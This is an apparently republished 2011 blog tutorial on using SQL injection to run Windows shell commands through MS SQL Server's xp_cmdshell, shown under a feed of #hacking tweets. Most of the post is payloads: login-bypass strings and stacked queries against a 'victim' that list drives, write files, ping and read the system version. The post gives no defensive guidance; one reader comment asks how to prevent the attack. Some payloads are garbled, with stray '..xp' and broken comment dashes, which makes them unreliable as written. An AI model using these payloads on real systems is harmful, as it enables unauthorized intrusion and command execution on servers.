Follow us on Twitter
  1. injunction_mp #hacking #news Bee Gees legend Robin Gibb dies aged 62: BEE GEES legend Robin Gibb has died... http://t.co/3bIT2fIw http://t.co/64lJ3Uib 1 minute
  2. DarkLordZim getting some #Hacking done. turned off the TV, and cranked the tunes… watching the kids rock out to punk-rock and stuff is quite fun. 2 minutes
  3. Hacking_Scandal #notw #hacking Cameron issues eurozone warnings: Prime Minister David Cameron warns EU lead... http://t.co/oyJMGhIY http://t.co/nUA4wElB 5 minutes
  4. HackingScandal #notw #hacking Cameron issues eurozone warnings: Prime Minister David Cameron warns EU lead... http://t.co/4niUckjI http://t.co/YpMgeYP5 5 minutes
  5. BiznComps #hacking How to tell if your #computer has been hacked http://t.co/bWDNw6W9 9 minutes
  6. matt_ritz Got the son doing some cli #hacking after installing #ubuntu 9 minutes
  7. rinorhoxha RT @e_hacking: Retweet if you love #backtrack :) Show your love now #infosec #hacking 10 minutes
Most popular
Login

SQL Injection Just A Little Beyond Injection

PostDateIconSunday, 19 June 2011 21:20 | PostAuthorIconWritten by Nrupen Masram | E-mail
User Rating: / 5
PoorBest 

If you have been a regular reader of my blog then you might remember following type of SQL queries,

1 ' OR ' 1 ' = ' 1
a ' OR ' 1 ' = ' 1
a ' OR ' a ' = ' a
Login: 1 ' OR ' 1 ' = ' 1
Password : 1 ' OR ' 1 ' = ' 1
http://victim/index.asp?id=1 ' OR ' 1 ' = ' 1

and similar variants they all are usually used to bypass login page. By the while discussing SQL injection several times I mentioned that SQL injection is kinda command injection attack. You might wonder a little if SQL injection is kinda command injection attack then how I can execute commands using it. Iintentionally left command injection part in SQL injection to cover it while discussing command injection.

First of all command injection using SQL injection works only on windows based shell means it will not work on Linux. Now how it works, as we know that SQL injection is not only a command injection it is also a code injection attack because each statement in SQL injection is interpreted code which terminates with ' ; ' (semicolon) which acts as statement terminator. While SQL injection you intentionally never use statement terminator because you already know web application does it automatically. While injecting commands a hacker can exploit this to execute commands using SQL injection by terminating statement and appending following command.
exec master..xp_cmdshell “” --

If victim is vulnerable to command injection attack via SQL injection then any SQL query you can inject will 100% support above appended code, have a look on following examples,

1 ' OR ' 1 ' = ' 1 ' ; exec master..xp_cmdshell “dir c:\” –
1 ' ; exec master..xp_cmdshell “dir c:\” –

Above commands will list all folders and files in C drive of vicim,

a ' OR ' 1 ' = ' 1 ; exec master..xp_cmdshell “echo You got hacked>file.txt ” –
a ' ; exec master..xp_cmdshell “echo You got hacked>file.txt ” –

Above statement will add a file in system with message You Got Hacked.

a ' OR ' a ' = ' a '; exec master..xp_cmdshell..xp “ping 127.0.0.1” -- Login:
1 ' OR ' 1 ' = ' 1 ' ; exec master..xp_cmdshell..xp “ping 127.0.0.1” --

Above statement will ping victim system.

Password : 1 ' OR ' 1 ' = ' 1 ' ; exec master..xp_cmdshell “ver” –

Above statement will display name and version of victim system. And there should be no surprise because even this works,

http://victim/index.asp?id=1 ' OR ' 1 ' = ' 1 ' ; exec master..xp_cmdshell “mkdir hacker” -

Source: nrupentheking.blogspot.com


Voeg deze pagina toe aan uw favoriete Social Bookmarking websites
Reddit! Del.icio.us! Mixx! Free and Open Source Software News Google! Live! Facebook! StumbleUpon! nujij msnrep ekudos TwitThis Joomla Free PHP
< Prev   Next >

Last Updated (Tuesday, 21 June 2011 06:59)

 

Comments  

 
+1 #1 Dave 2011-06-21 07:04
Maar hoe voorkom je het nu?
http://www.texaswebdevelopers.com/blog/template_permalink.asp?id=107
Quote
 

Add comment


Security code
Refresh

Aanverwante artikelen

Best Rated Content
Archive
Last comments
feed-image

Copyright 2008-2012.
All Rights Reserved.